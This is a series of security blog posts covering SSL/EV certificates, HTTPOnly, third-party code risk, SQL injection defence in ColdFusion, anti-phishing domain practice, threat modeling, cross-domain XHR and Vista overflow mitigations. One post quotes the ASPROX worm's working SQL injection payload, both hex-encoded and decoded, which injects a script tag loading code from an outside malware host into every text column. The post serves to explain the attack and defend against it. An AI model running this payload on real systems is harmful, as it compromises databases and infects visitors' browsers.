4
Dec

What a crock

   Posted by: Joshbw   in General Ramblings

In a recent conversation with a colleague on SSL and how it worked, it occurred to me that I really had no idea what Extended Validation certificates actually did, other than turn the address bar green and display the company name. What was the “extended validation” that made EV certs better than normal certs? In a normal SSL connection the client can do a reverse lookup based off of the cert to verify the host, but DNS poisoning would obviously render this worthless. Do EV certs have some magic in their “extended validation” that addresses this shortcoming?

In a word, no. There is no technical advancement in the EV cert. There is no technology that makes the EV certificate a better option than a normal cert, nothing that works around the regular cert’s weakness in verifying hosts. What the EV means is that the cert authority no longer does a half-assed job of verifying that it is issuing a certificate for a particular company to that company. They do a bit more background checking so that they can attest that the company listed in the cert is really the same company requesting it. It is brilliant marketing, as you are paying double to triple the cost of a normal cert just to turn the address bar green and to get the CA to actually do some checking on who requests a cert.

The thing is, despite the fact that there is no technological benefit of this, and the fact that current cert prices should have already included verifying the requester, that stupid green address bar is probably worth the money just to increase customer confidence. But go ahead and be bitter about it, since that shade of green is going to cost you another grand for each certificate. Man is Verisign brilliantly evil in their product ideas, right up there with the guy who conned children into buying pet rocks.

~ Joshbw

12
Nov

Hurray HTTPOnly

   Posted by: Joshbw   in Browser/Web Security

Hey Jim, MS fixed MSXML so that XHR can’t be used as a workaround to get the cookies when HTTPOnly is used. I think that makes IE first to have full HTTPOnly support. Now when HTTPOnly is used an attacker can’t get the session at all via XSS; they can only completely deface the website, use javascript keyloggers to monitor all use of the website, forward users off to phishing sites, host malware on legitimate hosts, and other little things.
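For anyone who hasn’t seen it, HTTPOnly is just a flag on the Set-Cookie header. A minimal sketch (the cookie name and value here are made up; Python’s stdlib http.cookies is just a convenient way to show what goes over the wire):

```python
from http import cookies

# Build a session cookie with the HttpOnly flag set. A compliant browser
# will send it back on requests but withhold it from script
# (document.cookie and XHR can't read it).
c = cookies.SimpleCookie()
c["sessionid"] = "d41d8cd98f00b204"   # illustrative value
c["sessionid"]["httponly"] = True

print(c.output())  # Set-Cookie: sessionid=d41d8cd98f00b204; HttpOnly
```

The flag does nothing server-side; it only changes what the browser lets page script see.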

One hole filled, uncountable holes left.

(unrelated, it’s posts like this that suggest security folks sometimes speak their own language)

~ Joshbw

Giblets aren’t just the disgusting parts of the turkey, the foul (or fowl, if you are no stranger to puns) organs that your grandma likes to try to fool you into eating for her own perverse amusement. In certain parlance they also refer to the external code that your applications are dependent on: source code over which you have little or no control. Giblets are typically libraries, assemblies, jars, or other such modules written by a third party, whether that is an external company (for example, the excellent looking Elegant Ribbon), another internal team, or a vendor. They are also a huge security concern, as you usually have little insight into what security was incorporated into a giblet’s development cycle, nor a great deal of control when vulnerabilities are discovered in the giblet. You can make your own code rock solid and still find your application exploited because of giblet code. MS Office has been hit by this a number of times, as legacy and third party file filters continue to be vulnerable despite the dramatic re-engineering of the Office file formats (.docx, .xlsx, etc.) with security in mind.

Recently my colleagues and I have been playing around with several different HTML encoders in Java. Despite what OWASP has posted on the subject, for an international enterprise it is not as simple as encoding everything that isn’t A-Z, a-z, 0-9 (though I don’t think OWASP is making any claim about the robustness of their recommendation). Having all of your Chinese characters suddenly converted to full character-encoded values is going to dramatically increase page size, especially on anything like a blog or other large text field with copious blocks of user input that get echoed to the screen. Most people don’t want to figure out how to implement their own character-set-aware, internationalized entity encoder, and so naturally prefer to use canned solutions. The desire to use a canned library is by no means unique to HTML entity encoding; for any number of functions this makes sense, since many functions take specific expertise (do you think your average PHP programmer wants to worry about image manipulation implementations, for example?). However, this specific case easily demonstrates why giblets are a big fat bag of security suck. What happens when there is a flaw in the encoder giblet? You really don’t know what the inside of it looks like; you don’t know how well written it is. You trust that it works, but if your output encoder isn’t encoding all output properly, your defense against XSS is now vulnerable.
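To make the page-size point concrete, here is a quick sketch (my own illustration, not any particular library’s implementation) comparing the encode-everything rule against an encoder that only escapes characters the HTML parser actually cares about:

```python
import html

def encode_everything(s):
    # The naive rule: escape anything outside A-Z, a-z, 0-9 as a
    # numeric character reference.
    return "".join(ch if ch.isascii() and ch.isalnum() else f"&#{ord(ch)};"
                   for ch in s)

def encode_minimal(s):
    # Charset-aware alternative: escape only HTML-significant characters;
    # CJK text passes through untouched.
    return html.escape(s, quote=True)

comment = "安全第一" * 50  # a block of Chinese user input, 200 characters
print(len(encode_everything(comment)))  # 1600 -- every character becomes &#NNNNN;
print(len(encode_minimal(comment)))     # 200  -- unchanged
```

Both outputs render identically in the browser; one of them is eight times the bytes.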

Really, any giblet that processes or transforms external data is a point of concern. To some extent open source giblets can be better, as you can at least look inside and see how well written something is (though I suspect the number of people who actually do so is small), but for enterprises this can actually be a liability, as legal departments worry about license compliance and IP taint. For all other giblets, there are a couple of recommendations to make you safer:

1) Ask for details about the giblet developer’s secure development lifecycle, vulnerability history, mean time to patch, and other useful behavioral questions about their security posture. It might be worth going with a giblet that has a bit less functionality if the security posture of its developers seems stronger.

2) External, vendor, or internal, get an SLA in place that clearly defines obligations. Include obligations to patch vulnerabilities of various criticality ratings, time frames for said patches, agreed-upon criticality scales (do you consider SQLi to be critical while they think it merely high?), and maintenance length (if a vulnerability is found five years after you purchased the giblet, are you out of luck getting a fix?). This is often overlooked when working with internally developed code from other teams; however, just as with external developers, your security vulnerability may not be the internal team’s priority. You need a commitment to address vulnerabilities in a timely fashion.

For non-commercial giblets, especially open source, you probably won’t get an SLA, so explore the ramifications and practicality of fixing the flaw yourself (see the aforementioned worry about license compliance and IP taint). Non-commercial, non-open-source giblets (freeware) are very dangerous, as you have no assurance concerning timely fixes, nor the capacity to fix them yourself.

3) Try to validate/sanitize all data before passing it to a giblet anyway, even if the Giblet developer has a great security posture and a very aggressive SLA. An added layer of defense is never a bad thing.

4) If the Giblet is consumed by a client, make sure any agreement with the Giblet developer includes the rights to distribute updated versions to the client.
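As a sketch of recommendation 3, here is a hypothetical wrapper (the giblet function, the filename rule, and every name here are invented for illustration) that validates input before the third-party code ever sees it:

```python
import re

# Hypothetical giblet: imagine a third-party library exposing a function
# that processes a user-supplied filename. The validation rule below is
# deliberately strict and illustrative, not a universal recipe.
SAFE_NAME = re.compile(r"[A-Za-z0-9_\-]{1,64}\.(png|jpg|gif)")

def call_giblet_safely(filename, giblet_fn):
    # Layered defense: reject obviously hostile input before the
    # third-party code sees it, even if the vendor's security posture
    # and SLA look great.
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected before reaching third-party code: %r" % filename)
    return giblet_fn(filename)

print(call_giblet_safely("photo.png", lambda f: "resized " + f))
```

The point is not the particular regex; it is that the giblet only ever receives data you have already constrained.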

Most importantly though, just keep in mind that third party code is a risk. Security should be as much a consideration as features when incorporating third party code, and all of the security effort you put in may be for naught if your third party code is vulnerable. When I draw threat models I like to label giblets as external entities even if they are processes or libraries consumed on the same box, as I have no control over them. It just helps to draw out the ramifications of their use.

~ Joshbw

22
Oct

Preventing SQL Injection in Cold Fusion

   Posted by: Joshbw   in Browser/Web Security

Well, the ASPROX worm has morphed to go after any page it finds ending with .cfm, which makes a good deal of sense. Much like .asp sites, a Cold Fusion site probably hasn’t been worked on in several years, was probably developed before SQL Injection was much of a worry, and is likely using SQL Server behind the scenes. The other day I stumbled across a website that was having problems connecting to its database and as a result spit out a lovely exception trace to the screen, including the exact syntax of its SQL query, which was not using prepared statements. Wanting to be the good little security monkey, I did some quick research into protecting against SQL Injection with Cold Fusion and sent the info on to them, as well as suggesting that they not spill their debug info out onto the interwebs for everyone to see.

Adobe has a pretty good page on protecting against SQL Injection, which makes it a little embarrassing that one of their own sites fell victim, but that will hopefully serve as a warning to us all to worry about legacy apps. Anyway, you can enforce parameter typing within your existing cfquery pretty easily by wrapping each parameter in a cfqueryparam. For example, the following query:

<cfquery name="Recordset1" datasource="mydatasource">
SELECT *
FROM myTable
WHERE myTableID = #URL.my_Table_ID#</cfquery>

would be turned into

<cfquery name="Recordset1" datasource="mydatasource">
SELECT *
FROM myTable
WHERE myTableID = <cfqueryparam value="#URL.my_Table_ID#" cfsqltype="cf_sql_numeric"></cfquery>

The cf_sql_numeric value ensures that the value passed will be treated as a number, rather than a string or function. This particular value should be of interest to everyone protecting against ASPROX, since rather than targeting strings, it targets parts of your query that you assume are numbers. You can find a list of all potential cfsqltype values here. Also listed are other attributes that can be valuable for doing rudimentary validation when using cfqueryparam, such as maxLength (it does what you think) and scale (the number of decimal places in a number). If you know of any old Cold Fusion sites out there, let the devs know that they should probably go back and make sure they are using cfqueryparam with all of their SQL parameters. With how effective ASPROX is at finding and exploiting sites, chances are they will be a victim if they do not.

~ Joshbw

In my last post, on threat modeling, I mentioned that there would be a follow-up post talking about the issues of authenticating the communication from the server. My cohort and fellow Josh has been working with me on some side projects with local small and mid-size businesses to secure their applications (things like auto dealership websites that collect information for credit checks), earning some extra income to offset the losses our investment accounts have taken in the past 18 months. In that process we have noticed several issues that keep coming up that make it harder to be confident we are talking to the application we think we are talking to.

In this day and age phishing is so easy because it is hard to authenticate the server to the client. There isn’t end-to-end trust. Ultimately the user has only a handful of verification methods: does the website visually look like the website they want to connect to, does the URL look like the correct domain, and is the communication over a secure channel, none of which is going to be obvious to non-technical users. The visual appearance is incredibly easy to spoof, to the point where only the laziest phisher won’t put forth the effort. Short of steganography, the visual appearance can’t be trusted, and steganography isn’t a viable option. So, here are a couple of things you can do outside of the visual appearance.

- Don’t use multiple domain names. You can register multiple domains, but always have them redirect to one domain, and never advertise anything but that one domain. This prevents dilution of the domain name and trains the user to trust only one domain. Don’t use BobsFordMazdaLincoln.com and BobsMazdaLincolnFord.com, because a phisher can set up bobsLincolnMazdaFord.com or a similar name. This is obviously a contrived example, but plenty of companies have a variety of domains for different purposes (Microsoft is really bad about this, and with their Live ID being an SSO for all of their domains it is easy for me to phish that credential to great payoff).

It is better to use sub-domains if you have separate sites associated with one company. It is also better to try to have a simple and short domain name, without too many words in it. bobscars.com is way better than BobsMazdaLincolnFord.com because it is much harder to create a variant that fools users. Bob could then have ford.bobscars.com, mazda.bobscars.com, etc. (and this scales if Bob ever opens other dealerships). Also, users are more likely to remember your domain name, and it will have fewer common mistype permutations (which you should buy; domains are cheap) if it is simple (something of which I am probably guilty with analyticalengine.net, a URL that even I mistype occasionally).

- Don’t go crazy with sub domains. You should probably only go one (or very rarely two) deep. mazda.bobscars.com is pretty simple to visually parse as being part of bobscars.com, but year2009.newcars.mazda.fordcorp.bobscars.com is going to be very easy to visually spoof to end users. We need to train customers to look at the domain name, and in order to do that it needs to be as apparent as possible. IE 8 does a good job calling this out, and there is a similar firefox plugin to highlight the domain name, but with many people still using IE 6 we need to focus on getting them to visually parse and recognize the domain (it would also be nice to get them to upgrade to a new browser). If we go overboard with subdomains we make the domain non-obvious and thus make it easy to spoof.

- Use SSL liberally, and use EV certs. The use of EV certs provides visual evidence in the location bar of the browser that this really is the corporation I intend to communicate with. It is one more protection that allows the user to visually identify the site. It offers more than that, though, as it can attest to the integrity of the communication back and forth with the site. Aforementioned cohort Josh has a post on his blog about using Ettercap to intercept communication and alter it in flight. The specific scenario he targeted was javascript-based logins, where the page is served over http to improve performance but the login field uses javascript to submit over https; using Ettercap he shows how he can modify the javascript while the page is being delivered so that it submits credentials elsewhere.

He recommends that to maintain performance you specifically force users to go to a separate page that is served start to finish over SSL. The problem is that 1) you don’t get the EV Cert based visual confirmation on the landing page if you do this and 2) if your landing page is sent in the clear you can use Ettercap to modify the url to the login page so the user goes offsite to submit credentials. Once a user is logged in you need to either have a ridiculously short session limit or make sure you continue to communicate over SSL, otherwise the sessionid will be sent in the clear which is almost as valuable as the user credentials.

I think it is much better to ALWAYS use SSL with EV certs, forced on every page. That way you get the visual validation of the cert on the landing page, the customer sees the little lock through the whole communication, and the entire conversation is resistant (not immune, but resistant) to tampering. This will impact performance on dial-up (I doubt it is noticeable to a human on broadband), though I think it might have the advantageous effect of forcing cleaner website design, but if you want to provide some level of certainty to the user it is the way to go. Obviously, this should be weighed based on the risk of the site; PayPal and banks should obviously do this, Engadget can probably do without. As a final piece of advice, make sure that you set the cookie flag so that session information is only sent over secure channels.
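That cookie flag is just the Secure attribute on the Set-Cookie header. A quick sketch (the cookie name and value are invented; Python’s stdlib http.cookies just makes the header easy to show):

```python
from http import cookies

# A session cookie the browser will only transmit over HTTPS (Secure),
# and also keep away from page script (HttpOnly) for good measure.
c = cookies.SimpleCookie()
c["sessionid"] = "abc123"          # illustrative value
c["sessionid"]["secure"] = True    # never sent over plain http
c["sessionid"]["httponly"] = True

print(c.output())
```

Without Secure, every non-SSL page load leaks the session id to anyone on the wire, undoing most of what the SSL login bought you.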

These aren’t bulletproof assurances. It is all based on visually notifying the user that this is the site they really mean to be on. It is very reliant on training user behavior, a generally unreliable approach, and then on the user consistently being wary, which is even more unreliable. However, at this point we don’t have much else we can really do. Sandbags may not be an ideal replacement for building on high ground, but it beats letting the water in. End-to-end trust is an unsolved problem, but we do what we can.

~ Joshbw

14
Oct

Threat Modeling, quick recommendations

   Posted by: Joshbw   in Secure Development

A paper by Adam Shostack is circulating the blogosphere, and it is worth a read. I’d already left MS before Adam took over as the gatekeeper of threat modeling for SWI, but it is nice to see that he basically agrees with the stripped-down version that we regularly did in WinCE and that I still evangelize. Mainly:

1) Draw a data flow diagram (DFD) of how data moves around your application/feature (depending on the scope of the model), and where trust boundaries are crossed

2) Enumerate threats. The paper has a nice little matrix of what threats are pertinent to what elements of the DFD and while he applies the necessary conditionals about it being specific to MS and perhaps not being universally applicable, I think it is a pretty good reference in general.

3) Determine Mitigations (or decide to let a threat slide)

4) Validate mitigations that are put in place

We lived by those simple steps, rather than getting into the horrid threat trees and DREAD risk modeling and all of that other overhead. I say this having been the security guy for my area in MS, supposedly the expert, and I ignored them. I can’t imagine the average non-security guy going to that trouble. Granted, being a security guy I probably find it a bit easier to subjectively (wait, am I supposed to say qualitatively now that I am a CISSP?) determine risk from a threat than to put a number on it, which is what the overhead in threat modeling was supposed to do, but I think most non-experts can still make an educated guess.

Anyway, the reason I am bringing all of this up is to illuminate one aspect that isn’t touched on much in most threat modeling discussions: don’t just focus on your own process/components. When people create a data flow diagram and start thinking about threats and mitigations, they tend to focus on threats specific to their own code and how to mitigate stuff entering that code. However, if we look at a vulnerability like XSS, it isn’t a threat to your own code; it is a threat to external entities (in this case, client browsers), and the best mitigation is to sanitize (HTML encode) data as it leaves your application rather than validate it as it enters (you still need to validate it as it enters to make sure it isn’t malicious to your code, but don’t worry about flat-out stopping XSS with input validation if you can output encode).
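The encode-on-exit idea can be sketched in a few lines (the function names and storage here are made up for illustration; html.escape stands in for whatever encoder your stack provides):

```python
import html

def store_comment(db, user_input):
    # Input side: keep what the user sent (validate it elsewhere for
    # threats to *your* code). No HTML mangling on the way in.
    db.append(user_input)

def render_comment(raw):
    # Output side: escape at the point where data leaves your app for
    # the browser, the external entity actually under threat.
    return "<p>" + html.escape(raw, quote=True) + "</p>"

db = []
store_comment(db, "<script>alert(1)</script>")
print(render_comment(db[0]))  # <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
```

Encoding at the exit means each output channel (HTML, SQL, another server) gets the encoding appropriate to it, instead of one input filter trying to anticipate them all.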

Similarly, in the above web app example, a threat model would have us worry about how to authenticate the client for repudiation and information disclosure purposes, but I haven’t been to many threat modeling sessions where the team originally considered the data flow in the other direction (establishing to the client that this is the server it can trust; more on that in a post in the near future).

So as you are developing your threat model be sure to consider threats to each of the entities in the DFD. Don’t focus only on the flow into your components, and don’t consider threats to just your components, but rather look at the full ecology represented in your DFD.

~ Joshbw

Well, you announce that you are going to post a whole bunch of information, including technical details, in a whitepaper through I Hack Charities, so a whole slew of AppSec folks and web hackers go register. Then you notice that the registration page is in the clear.

Now granted, the whole payment solution is through paypal, so other than your credentials there isn’t much to steal, but seriously Johnny, couldn’t you get Verisign to donate SSL certs for charity?

~ Joshbw

The HTML 5 spec lays out the details for cross domain XHR. I’ve written about my dislike of the idea before (details of the access control spec can be found here; I like how they justify sending cookies via XHR because you send them with img requests. In other news, if you don’t need seatbelts on a motorcycle you don’t need them in a car because obviously they are exactly the same scenarios), specifically why passing cookies is a VERY BAD IDEA.

Today I am going to focus on the other side of things, not from the user’s perspective, but from the perspective of the third party host (3PH) that is now getting requests from the client. To allow a 3PH to make discriminating decisions the source origin of the request (not the client, but the originator host of the call, though because of POORLY WRITTEN AND LAID OUT SPECS I am unable to tell if a page loaded from somesite.com that loads a script from someothersite.com that makes the actual call would consider the source origin somesite or someothersite) is passed in the origin field of the request. This origin is based off of what the browser thinks is the origin, rather than the actual origin. Thus any tricks that would fool a browser into loading a malicious site under a safe url would also fool the 3PH. ARP spoofing (for various reasons I have been exposed to techniques to do this with Ettercap recently, and it makes this very easy), DNS poisoning, and other similar techniques could be employed quite effectively for even bigger payout (not only do you fool the user into disclosing credentials or other sensitive information for website A, you also get all sorts of sensitive information from 3PH via cross domain XHR).

To some extent they could mitigate this. The origin field could also contain the DNS and ARP information the client *thinks* belongs to the origin, and this could be independently verified by the 3PH. Granted, the spec doesn’t call for this, but it *could* be made safer. From the perspective of the 3PH, though, even if you can verify that the origin really is the website you expect, there is NO assurance of the integrity of that website. How many sites have XSS or SQL injection? Are you confident that the origin does not? Security is only as strong as the weakest link, and by exposing your customers’ data to the origin through cross domain XHR, that weakest link may be the origin rather than you.

Any data exposed through cross domain XHR should be considered public as soon as it is exposed, regardless of the origin field, since you can’t really verify who is reading it. Because of that, does it really matter what the origin field says? I think the best bet for cross domain XHR is to explicitly let each user opt in to making certain information available to the world through scripting, with no assurance that only “trusted parties” would be able to script against it (since you can’t make that assurance in good conscience). All data exposed this way may be user specific in nature, but should be of trivial value, since it will be effectively unprotected. 3PHs should also recognize that this is the easy way of exposing data, but by no means the safe or right way. This whole proposal was introduced by scripters who wanted one more snazzy feature regardless of security implications, because having a federated webservice strategy smacks of effort.
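If a 3PH does decide to play along, the posture above might look something like this sketch (the allowlist, field names, and response shape are all hypothetical; the point is that the origin field routes requests but never authenticates them):

```python
# Treat the Origin header as routing information, not authentication:
# it reflects what the *browser* believes, and upstream ARP/DNS tricks
# can make the browser believe anything.
PUBLIC_FIELDS = {"display_name"}            # trivial-value, user-opted-in data only
ALLOWED_ORIGINS = {"https://somesite.com"}  # hypothetical partner origin

def cross_domain_response(origin, requested_field, profile):
    if origin not in ALLOWED_ORIGINS:
        return None  # refuse unknown origins outright
    if requested_field not in PUBLIC_FIELDS:
        return None  # never expose sensitive fields via cross domain XHR
    return profile.get(requested_field)

profile = {"display_name": "josh", "ssn": "000-00-0000"}
print(cross_domain_response("https://somesite.com", "display_name", profile))  # josh
print(cross_domain_response("https://somesite.com", "ssn", profile))           # None
```

Even a matching allowlist entry only tells you which site the browser *thinks* it loaded, which is exactly why only trivial-value data belongs behind it.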

Oh, one last thing to consider, 3PH: you need to kill that timeout you put on your session to get all of this to work, which is considered BAD PRACTICE. You open yourself up to all sorts of concerns if your sessions don’t time out, and just because Google follows that bad practice doesn’t mean you should. It is good to make users log in periodically.

~ Joshbw

18
Sep

Output Sanitization

   Posted by: Joshbw   in Browser/Web Security

Jim Manico had a pretty good post on output encoding a couple weeks ago. Please don’t take my comments in its thread to imply in any way that I disagree with his general premise. Injection attacks are among the most common severe attacks a website can face, and security professionals tend to prescribe input validation when output encoding is more appropriate. When passing data on to other entities (the client, a database, other servers), transferring it via a safe method in a sanitized form is the optimal way to go. Input validation in this instance is sub-optimal.

As an example, I am freelancing with a local webhost trying to rectify some attacks from the ASPROX worm. The attack vector is brilliant. What gets submitted is:

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415
245204054205641524348415228323535292C40432056415243484152283
2353529204445434C415245205461626C655F437572736F7220435552534
F5220464F522053454C45435420612E6E616D652C622E6E616D652046524
F4D207379736F626A6563747320612C737973636F6C756D6E73206220574
845524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D33352
04F5220622E78747970653D323331204F5220622E78747970653D3136372
9204F50454E205461626C655F437572736F72204645544348204E4558542
046524F4D205461626C655F437572736F7220494E544F2040542C4043205
748494C4528404046455443485F5354415455533D302920424547494E204
55845432827555044415445205B272B40542B275D20534554205B272B404
32B275D3D525452494D28434F4E564552542856415243484152283430303
0292C5B272B40432B275D29292B27273C736372697074207372633D68747
4703A2F2F7777772E61647739352E636F6D2F622E6A733E3C2F736372697
0743E27272729204645544348204E4558542046524F4D205461626C655F4
37572736F7220494E544F2040542C404320454E4420434C4F53452054616
26C655F437572736F72204445414C4C4F43415445205461626C655F43757
2736F7220%20AS%20VARCHAR(4000));EXEC(@S);–

(arg, my kingdom for firefox to add support for “word-wrap:break-word”. I know it was originally an IE deviation, but it is now in CSS 3. Also, sometimes additions outside of spec are fine when they clearly make sense, like word-wrap.)

This gets interpreted as:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.adw95.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Now this is a genius little worm. It scans across all the tables available with a cursor and automatically appends the malware attack (usually a reference to a hosted .js that exploits browser vulnerabilities) to the end of all the various fields of some text type. There is some serious SQL ninja stuff that exceeds my T-SQL skills here, but most noteworthy is that there is no ' anywhere in the string. Now the vulnerable site WAS doing limited input validation, automatically escaping all ' before submitting a query, but that was obviously irrelevant to the attack. Had they just been using bindable queries (aka parameterized queries, depending on your parlance preference) they would have been fine.
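To illustrate what a bound parameter buys you, here is a sketch using Python’s sqlite3 (the schema is invented and sqlite stands in for SQL Server; the point is the placeholder, not the engine):

```python
import sqlite3

# With a bound parameter, the driver hands the value to the engine
# separately from the statement, so even a payload with no quote
# characters (like ASPROX's CAST trick) can't change the query's shape.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE myTable (myTableID INTEGER, body TEXT)")
conn.execute("INSERT INTO myTable VALUES (1, 'hello')")

hostile = "1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x44 AS VARCHAR);EXEC(@S);--"
rows = conn.execute(
    "SELECT body FROM myTable WHERE myTableID = ?", (hostile,)
).fetchall()
print(rows)  # [] -- the whole payload was compared as one literal value
```

Escaping quotes tries to outguess the parser; binding the value means there is nothing to parse.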

All of that does reinforce Jim’s point. For the most common web attacks, XSS and SQL Injection, output sanitization is more effective than input validation. That said, you need to do both. Both of those attacks are actually against external entities, other clients and the database respectively, which illustrates a point- for every external entity you are communicating with you need to pass the output in a clean and safe form to that entity. Hence output encoding/sanitization. To protect yourself, however, you need to do input validation. At the moment output attacks are the most common, as they are relatively easy and don’t require much knowledge of the application logic, however as those holes are plugged there are going to be increasing attacks against the application itself. At that point, input validation is the first line of defense.

So the rule of thumb for developing reasonably secure applications: don’t trust any input you get and be sure to validate it, and sanitize all output EVEN if you are doing input validation, to make sure you aren’t passing off an attack.

~ Joshbw

12
Aug

Windows Buffer Overflow Protection

   Posted by: Joshbw   in Secure Development

At Black Hat this year Mark Dowd of IBM and Alexander Sotirov of VMware presented a paper concerning how to bypass Vista’s buffer overflow countermeasures. The paper is worth a read both because of the vulnerabilities and because it does a great job detailing how much protection Microsoft has provided to people who can’t write good code. The analysis of the paper by various people on the Internet is mind numbing though (probably this post included).

Before continuing, I think some things need to be established up front. Vista provides protection that no other OS does against poorly written code. Even if the security features were completely worthless, Vista would not be more dangerous than any other OS, just more dangerous than Vista from last month. This additional protection was meant to be a stopgap to secure bad code, not an excuse not to fix the bad code. The root cause is that some code sucks to begin with. It is like throwing a WAF on a wide open Internet app. That buffer overflows still exist to the extent they do is just disgraceful to us as an industry. We know exactly what causes buffer overflows and we know how to avoid them. Do not use unchecked buffer copies. Explicitly copy no more data than a buffer can hold (and please, please do not use inline calculations in strncpy, since that may as well be an unchecked buffer copy). Don’t dynamically create the first argument for *printf/*scanf without knowing exactly how many other parameters will need to be provided. And the list goes on. These are all things that static source code analysis tools are remarkably competent at finding. A clever source control system will flat out ban people from checking in code with bad APIs (strcpy and its unchecked brethren). Finally, fuzz the crap out of all your input points (hey Jim, this is why input validation is important :-p). You will find and kill 99% of your buffer overflows if you do that, and the remaining 1% won’t be very discoverable (bad guys do fuzz testing too, you know).

Anyway, there is a reason why MS has had a huge decline in buffer overflows relative to the industry, and it is because they do all of the above. They have too much legacy code and third party giblets to fully get rid of overflows, but all of the extra protection in Vista is primarily to provide some level of protection for the OS because a retarded third party (*cough*quicktime*cough*acrobat*cough*flash*cough) has yet one more buffer overflow that can be used to compromise the box. The protection was not a permanent fix, but simply something to raise the bar to perform exploitation, and I think Microsoft has been reasonably good about presenting it in that light while still trying to sell 3rd party developers on the protection. The biggest flaw in the protections that Vista presents is that applications opt into using them. Programs need to explicitly state they want the protection which is why the paper focuses on exploiting applications that do not have all of the protections (like IE 7 which doesn’t use data execution prevention because the poorly written piece of junk sun java plugin would blow chunks if they did; fortunately IE 8 does use it, as does firefox 3).

Now on to the commentary on the web. Peter Bright of Ars Technica tries to downplay it and many of his points are valid. Bruce Schneier thinks it is a big deal, which is true. A month ago people didn’t know how to bypass these protections but now they do. That is a big deal, but Adrian Kingsley-Hughes of ZDnet is still a moron for saying it renders Vista security next to useless.

So to respond to the commentary, the reason this is a big deal (more so than Bright believes) but not the end of the world (as Kingsley-Hughes thinks) is that it makes exploits feasible but more costly. Any technological measure that increases the cost of exploiting something will decrease the number of instances that blackhats bother exploiting it. For example, to defeat ASLR the authors advocate hosting a .Net web component of sufficient size to dramatically impact how the address space can be randomized, and to facilitate downloads they also recommend the webserver hosting the component use gzip compression (which in turn means controlling web server configuration). That’s entirely possible, but if a malware author had the choice between an exploit targeting all of XP that didn’t require that extra work or an exploit for both XP and Vista, I suspect 90% would choose to just go after XP. (The exploit using Java applets is a bit more likely at the moment due to the recently discussed GIFAR hack, since you can very easily get hundreds of sites to host that for you.)

On top of that, to bypass the multitude of protections requires some sophistication, which is just going to raise the bar on who crafts the exploits (well, until all of the bypasses are just built into metasploit). Raising the bar lowers the number of attackers capable of compromising the system.

Additionally, the easiest workaround for DEP was to target applications that don’t use it, but this will become increasingly difficult, especially as MS enforces DEP to a greater degree. Finally, at least in terms of IE, one feature that was not addressed is the process isolation of the browser in Vista. It remains an open question whether the IE sandbox in Vista is vulnerable, as it may still contain the attack.

So attacks are now possible, but exploitation is still more difficult than on other platforms. That’s big, but it by no means renders the protection next to useless. As the authors conclude:

In this paper we demonstrated that the memory protection mechanisms available in the latest versions of Windows are not always effective when it comes to preventing the exploitation of memory corruption vulnerabilities in browsers. They raise the bar, but the attacker still has a good chance of being able to bypass them. Two factors contribute to this problem: the degree to which the browser state is controlled by the attacker; and the extensible plugin architecture of modern browsers.

At the end of the day, good OS design cannot completely mitigate bad code. Get rid of buffer overflows and this is all a moot point anyway. It’s 2008, people, why aren’t buffer overflows extinct?

~ Joshbw